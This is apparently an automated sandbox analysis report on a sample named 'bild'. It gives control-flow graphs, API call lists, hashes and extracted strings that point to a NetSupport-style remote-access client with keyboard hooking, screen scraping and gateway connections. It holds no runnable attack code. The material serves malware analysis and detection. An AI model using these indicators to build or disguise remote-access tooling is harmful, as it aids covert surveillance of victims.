                                                                                          • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                          • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
                                                                                          • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                          • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2282 11133920-1113395c 2283 11133962-11133984 call 1105dd10 2282->2283 2284 11133c84-11133c9f call 11161d01 2282->2284 2283->2284 2289 1113398a-1113399e GetLocalTime 2283->2289 2290 111339c1-11133a43 LoadLibraryA call 110098c0 call 11015c30 GetCurrentProcess 2289->2290 2291 111339a0-111339bc call 11146450 2289->2291 2298 11133a45-11133a5b GetProcAddress 2290->2298 2299 11133a5d-11133a64 GetProcessHandleCount 2290->2299 2291->2290 2298->2299 2300 11133a66-11133a68 SetLastError 2298->2300 2301 11133a6e-11133a76 2299->2301 2300->2301 2302 11133a92-11133a9e 2301->2302 2303 11133a78-11133a90 GetProcAddress 2301->2303 2305 11133aa0-11133ab8 GetProcAddress 2302->2305 2307 11133aba-11133ac5 2302->2307 2303->2302 2304 11133ac7-11133ad2 SetLastError 2303->2304 2304->2305 2305->2307 2308 11133ad4-11133adc SetLastError 2305->2308 2309 11133adf-11133aef GetProcAddress 2307->2309 2308->2309 2311 11133af1-11133afd K32GetProcessMemoryInfo 2309->2311 2312 11133aff-11133b01 SetLastError 2309->2312 2313 11133b07-11133b15 2311->2313 2312->2313 2314 11133b23-11133b2e 2313->2314 2315 11133b17-11133b1f 2313->2315 2316 11133b30-11133b38 2314->2316 2317 11133b3c-11133b47 2314->2317 2315->2314 2316->2317 2318 11133b55-11133b5f 2317->2318 2319 11133b49-11133b51 2317->2319 2320 11133b61-11133b68 2318->2320 2321 11133b6a-11133b6d 2318->2321 2319->2318 2322 11133b6f-11133b7d call 11146450 2320->2322 2321->2322 2323 11133b80-11133b92 2321->2323 2322->2323 2327 11133c5a-11133c68 2323->2327 2328 11133b98-11133baa call 110637c0 2323->2328 2330 11133c6a-11133c6b FreeLibrary 2327->2330 2331 11133c6d-11133c75 2327->2331 2328->2327 2336 11133bb0-11133bd1 call 1105dd10 2328->2336 2330->2331 2332 11133c77-11133c78 FreeLibrary 2331->2332 2333 11133c7a-11133c7f 2331->2333 2332->2333 2333->2284 2335 11133c81-11133c82 FreeLibrary 2333->2335 2335->2284 2339 11133bd3-11133bd9 2336->2339 2340 11133bdf-11133bfb call 1105dd10 2336->2340 2339->2340 2341 11133bdb 2339->2341 2344 11133c06-11133c22 call 1105dd10 2340->2344 2345 11133bfd-11133c00 2340->2345 2341->2340 2349 11133c24-11133c27 2344->2349 2350 11133c2d-11133c49 call 1105dd10 2344->2350 2345->2344 2346 11133c02 2345->2346 2346->2344 2349->2350 2351 11133c29 2349->2351 2354 11133c50-11133c53 2350->2354 2355 11133c4b-11133c4e 2350->2355 2351->2350 2354->2327 2356 11133c55 call 11027780 2354->2356 2355->2354 2355->2356 2356->2327
                                                                                          APIs
                                                                                            • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                          • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,F3EE1E80), ref: 1113398E
                                                                                          • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                          • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                          • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                          • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
                                                                                          • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                          • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                          • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                          • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                          • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                          • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                          • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
                                                                                          • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                          • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                          • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                          • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                          • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                          • API String ID: 263027137-1001504656
                                                                                          • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                          • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                          • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                          • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2358 1102dbc9 2359 1102dbd0-1102dbe1 2358->2359 2359->2359 2360 1102dbe3 2359->2360 2361 1102dd24-1102dd3d call 11142ac0 2360->2361 2364 1102dd43-1102dd45 2361->2364 2365 1102dbc0-1102dbc3 2361->2365 2366 1102de43-1102de5d call 111463d0 2364->2366 2367 1102dd4b-1102dd51 2364->2367 2368 1102dbc5-1102dbc7 2365->2368 2369 1102dbe8-1102dbf1 2365->2369 2392 1102deb3-1102debf call 1102b4f0 2366->2392 2393 1102de5f-1102de78 call 1105dd10 2366->2393 2372 1102dd53-1102dd62 call 11144dc0 2367->2372 2373 1102dd68-1102dd78 2367->2373 2368->2359 2369->2361 2370 1102dbf7-1102dbfe 2369->2370 2370->2361 2374 1102dcf3-1102dd08 call 11162de7 2370->2374 2375 1102dc05-1102dc07 2370->2375 2376 1102dd0a-1102dd1f call 11162de7 2370->2376 2377 1102dc9a-1102dccd call 111618c1 call 11142290 2370->2377 2378 1102dcdb-1102dcf1 call 11164010 2370->2378 2379 1102dc8b-1102dc95 2370->2379 2380 1102dccf-1102dcd9 2370->2380 2381 1102dc4c-1102dc52 2370->2381 2382 1102dc7c-1102dc86 2370->2382 2372->2373 2385 1102dd7a 2373->2385 2386 1102dd7f-1102dd9d call 1102cc10 2373->2386 2374->2361 2375->2361 2391 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 2375->2391 2376->2361 2377->2361 2378->2361 2379->2361 2380->2361 2395 1102dc54-1102dc68 call 11162de7 2381->2395 2396 1102dc6d-1102dc77 2381->2396 2382->2361 2385->2386 2386->2366 2407 1102dda3-1102ddc8 call 110b7920 call 11146450 2386->2407 2391->2361 2415 1102dec1-1102dec8 2392->2415 2416 1102de98-1102de9f 2392->2416 2393->2392 2418 1102de7a-1102de8c 2393->2418 2395->2361 2396->2361 2441 1102ddd3-1102ddd9 2407->2441 2442 1102ddca-1102ddd1 2407->2442 2420 1102dea5-1102dea8 2415->2420 2421 1102deca-1102ded4 2415->2421 2416->2420 2423 1102e0aa-1102e0cb GetComputerNameA 2416->2423 2418->2392 2438 1102de8e 2418->2438 2424 1102deaa-1102deb1 call 110b7920 2420->2424 2425 1102ded9 2420->2425 2421->2423 2430 1102e103-1102e109 2423->2430 2431 1102e0cd-1102e101 call 11027c30 2423->2431 2434 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 2424->2434 2425->2434 2435 1102e10b-1102e110 2430->2435 2436 1102e13f-1102e152 call 11164010 2430->2436 2431->2430 2462 1102e157-1102e163 2431->2462 2490 1102e07a-1102e082 SetLastError 2434->2490 2491 1102dfbc-1102dfd3 2434->2491 2440 1102e116-1102e11a 2435->2440 2459 1102e347-1102e36a 2436->2459 2438->2416 2450 1102e136-1102e138 2440->2450 2451 1102e11c-1102e11e 2440->2451 2446 1102dddb-1102dde2 call 11027d60 2441->2446 2447 1102de39 2441->2447 2442->2366 2446->2447 2465 1102dde4-1102de16 2446->2465 2447->2366 2457 1102e13b-1102e13d 2450->2457 2454 1102e132-1102e134 2451->2454 2455 1102e120-1102e126 2451->2455 2454->2457 2455->2450 2463 1102e128-1102e130 2455->2463 2457->2436 2457->2462 2471 1102e392-1102e39a 2459->2471 2472 1102e36c-1102e372 2459->2472 2467 1102e165-1102e17a call 110b7920 call 11029bd0 2462->2467 2468 1102e17c-1102e18f call 11081a70 2462->2468 2463->2440 2463->2454 2485 1102de20-1102de2f call 110f6080 2465->2485 2486 1102de18-1102de1e 2465->2486 2499 1102e1d3-1102e1ec call 11081a70 2467->2499 2483 1102e191-1102e1b4 2468->2483 2484 1102e1b6-1102e1b8 2468->2484 2479 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 2471->2479 2480 1102e39c-1102e3a9 call 11035dd0 call 111618c1 2471->2480 2472->2471 2477 1102e374-1102e38d call 1102d330 2472->2477 2477->2471 2480->2479 2483->2499 2493 1102e1c0-1102e1d1 2484->2493 2495 1102de32-1102de34 call 1102d330 2485->2495 2486->2485 2486->2495 2501 1102e043-1102e04f 2490->2501 2491->2501 2517 1102dfd5-1102dfde 2491->2517 2493->2493 2493->2499 2495->2447 2522 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 2499->2522 2523 1102e32c-1102e339 call 11164010 2499->2523 2506 1102e092-1102e0a1 2501->2506 2507 1102e051-1102e05d 2501->2507 2506->2423 2515 1102e0a3-1102e0a4 FreeLibrary 2506->2515 2512 1102e06f-1102e073 2507->2512 2513 1102e05f-1102e06d GetProcAddress 2507->2513 2518 1102e084-1102e086 SetLastError 2512->2518 2519 1102e075-1102e078 2512->2519 2513->2512 2515->2423 2517->2501 2520 1102dfe0-1102e016 call 11146450 call 1112b270 2517->2520 2524 1102e08c 2518->2524 2519->2524 2520->2501 2543 1102e018-1102e03e call 11146450 call 11027920 2520->2543 2558 1102e283-1102e299 call 11128ec0 2522->2558 2559 1102e26f-1102e27e call 11029450 2522->2559 2536 1102e33c-1102e341 CharUpperA 2523->2536 2524->2506 2536->2459 2543->2501 2563 1102e2b2-1102e2ec call 110d0bd0 * 2 2558->2563 2564 1102e29b-1102e2ad call 110d0bd0 2558->2564 2559->2558 2571 1102e302-1102e32a call 11164010 call 110d07c0 2563->2571 2572 1102e2ee-1102e2fd call 11029450 2563->2572 2564->2563 2571->2536 2572->2571
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID: $14/03/16 10:38:31 V12.10F8$506407$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                          • API String ID: 1029625771-3351986879
                                                                                          • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                          • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                          • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                          • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2578 111414a0-111414e1 call 11146450 2581 111414e7-11141543 LoadLibraryA 2578->2581 2582 11141569-11141593 call 11142e80 call 11146ee0 LoadLibraryA 2578->2582 2583 11141545-11141550 call 11017450 2581->2583 2584 11141557-11141560 2581->2584 2593 11141595-1114159b 2582->2593 2594 111415c3 2582->2594 2583->2584 2592 11141552 call 110cc7f0 2583->2592 2584->2582 2587 11141562-11141563 FreeLibrary 2584->2587 2587->2582 2592->2584 2593->2594 2596 1114159d-111415a3 2593->2596 2597 111415cd-111415ed GetClassInfoExA 2594->2597 2596->2594 2598 111415a5-111415c1 call 1105dd10 2596->2598 2599 111415f3-1114161a call 11161d20 call 111444b0 2597->2599 2600 1114168e-111416e6 2597->2600 2598->2597 2609 11141633-11141675 call 111444b0 call 111444e0 LoadCursorA GetStockObject RegisterClassExA 2599->2609 2610 1114161c-11141630 call 11029450 2599->2610 2611 11141722-11141728 2600->2611 2612 111416e8-111416ee 2600->2612 2609->2600 2634 11141677-1114168b call 11029450 2609->2634 2610->2609 2614 11141764-11141786 call 1105dd10 2611->2614 2615 1114172a-11141739 call 1110f420 2611->2615 2612->2611 2617 111416f0-111416f6 2612->2617 2631 11141794-11141799 2614->2631 2632 11141788-11141792 2614->2632 2629 1114175d 2615->2629 2630 1114173b-1114175b 2615->2630 2617->2611 2622 111416f8-1114170f call 1112c830 LoadLibraryA 2617->2622 2622->2611 2633 11141711-1114171d GetProcAddress 2622->2633 2635 1114175f 2629->2635 2630->2635 2636 111417a5-111417ab 2631->2636 2637 1114179b 2631->2637 2632->2636 2633->2611 2634->2600 2635->2614 2638 111417ad-111417b3 call 110f7d00 2636->2638 2639 111417b8-111417d1 call 1113cd80 2636->2639 2637->2636 2638->2639 2646 111417d7-111417dd 2639->2646 2647 11141879-1114188a 2639->2647 2648 111417df-111417f1 call 1110f420 2646->2648 2649 11141819-1114181f 2646->2649 2660 111417f3-11141809 call 1115d6d0 2648->2660 2661 1114180b 2648->2661 2650 11141845-11141851 2649->2650 2651 11141821-11141827 2649->2651 2655 11141853-11141859 2650->2655 2656 11141868-11141873 #17 LoadLibraryA 2650->2656 2653 1114182e-11141840 SetTimer 2651->2653 2654 11141829 call 11134930 2651->2654 2653->2650 2654->2653 2655->2656 2659 1114185b-11141861 2655->2659 2656->2647 2659->2656 2663 11141863 call 1112d6a0 2659->2663 2662 1114180d-11141814 2660->2662 2661->2662 2662->2649 2663->2656
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                          • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                          • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                          • _memset.LIBCMT ref: 111415F9
                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                          • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                          • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                          • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                          • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                          • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                          • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                          • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                            • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,F3EE1E80,1102FCB2,00000000), ref: 1101747E
                                                                                            • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                            • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                            • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                            • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                            • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                          • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                          • API String ID: 3706574701-3145203681
                                                                                          • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                          • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                          • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                          • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2667 6c5d63c0-6c5d6402 call 6c5f4710 EnterCriticalSection InterlockedDecrement 2670 6c5d65ed-6c5d6608 LeaveCriticalSection call 6c5f28e1 2667->2670 2671 6c5d6408-6c5d641f EnterCriticalSection 2667->2671 2672 6c5d64da-6c5d64e0 2671->2672 2673 6c5d6425-6c5d6431 2671->2673 2678 6c5d65bd-6c5d65e8 call 6c5f1c50 LeaveCriticalSection 2672->2678 2679 6c5d64e6-6c5d64f0 shutdown 2672->2679 2676 6c5d6443-6c5d6447 2673->2676 2677 6c5d6433-6c5d6441 GetProcAddress 2673->2677 2680 6c5d644e-6c5d6450 SetLastError 2676->2680 2681 6c5d6449-6c5d644c 2676->2681 2677->2676 2678->2670 2682 6c5d650a-6c5d652d timeGetTime #16 2679->2682 2683 6c5d64f2-6c5d6507 GetLastError call 6c5d30a0 2679->2683 2685 6c5d6456-6c5d6465 2680->2685 2681->2685 2687 6c5d656c-6c5d656e 2682->2687 2688 6c5d652f 2682->2688 2683->2682 2692 6c5d6477-6c5d647b 2685->2692 2693 6c5d6467-6c5d6475 GetProcAddress 2685->2693 2690 6c5d6570-6c5d657b closesocket 2687->2690 2695 6c5d6551-6c5d656a #16 2688->2695 2696 6c5d6531 2688->2696 2697 6c5d657d-6c5d658a WSAGetLastError 2690->2697 2698 6c5d65b6 2690->2698 2699 6c5d647d-6c5d6480 2692->2699 2700 6c5d6482-6c5d6484 SetLastError 2692->2700 2693->2692 2695->2687 2695->2688 2696->2695 2701 6c5d6533-6c5d653e GetLastError 2696->2701 2702 6c5d658c-6c5d658e Sleep 2697->2702 2703 6c5d6594-6c5d6598 2697->2703 2698->2678 2704 6c5d648a-6c5d6499 2699->2704 2700->2704 2701->2687 2705 6c5d6540-6c5d6547 timeGetTime 2701->2705 2702->2703 2703->2690 2706 6c5d659a-6c5d659c 2703->2706 2708 6c5d64ab-6c5d64af 2704->2708 2709 6c5d649b-6c5d64a9 GetProcAddress 2704->2709 2705->2687 2710 6c5d6549-6c5d654b Sleep 2705->2710 2706->2698 2713 6c5d659e-6c5d65b3 GetLastError call 6c5d30a0 2706->2713 2711 6c5d64b1-6c5d64be 2708->2711 2712 6c5d64c3-6c5d64d5 SetLastError 2708->2712 2709->2708 2710->2695 2711->2678 2712->2678 2713->2698
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(6C61B898,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D63E8
                                                                                          • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6C5D63FA
                                                                                          • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6412
                                                                                          • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C5D643B
                                                                                          • SetLastError.KERNEL32(00000078,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6450
                                                                                          • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C5D646F
                                                                                          • SetLastError.KERNEL32(00000078,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6484
                                                                                          • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C5D64A3
                                                                                          • SetLastError.KERNEL32(00000078,?,00000000,?,6C5DD77B,00000000), ref: 6C5D64C5
                                                                                          • shutdown.WSOCK32(?,00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D64E9
                                                                                          • GetLastError.KERNEL32(?,00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D64F2
                                                                                          • timeGetTime.WINMM(?,00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6510
                                                                                          • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6526
                                                                                          • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6533
                                                                                          • timeGetTime.WINMM(?,00000000,?,6C5DD77B,00000000), ref: 6C5D6540
                                                                                          • Sleep.KERNEL32(00000001,?,00000000,?,6C5DD77B,00000000), ref: 6C5D654B
                                                                                          • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6563
                                                                                          • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D6574
                                                                                          • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D657D
                                                                                          • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D658E
                                                                                          • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6C5DD77B,00000000), ref: 6C5D659E
                                                                                          • _memset.LIBCMT ref: 6C5D65C8
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,6C5DD77B,00000000), ref: 6C5D65D7
                                                                                          • LeaveCriticalSection.KERNEL32(6C61B898,?,00000000,?,6C5DD77B,00000000), ref: 6C5D65F2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                          • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                          • API String ID: 3764039262-2631155478
                                                                                          • Opcode ID: f3d403a941c4984374258638dd86798888d02ad622736958829eb0afce58e01c
                                                                                          • Instruction ID: d350ec50ab228f9414e152a4c03de73e372ac209e7368118c740cc8463c9be9d
                                                                                          • Opcode Fuzzy Hash: f3d403a941c4984374258638dd86798888d02ad622736958829eb0afce58e01c
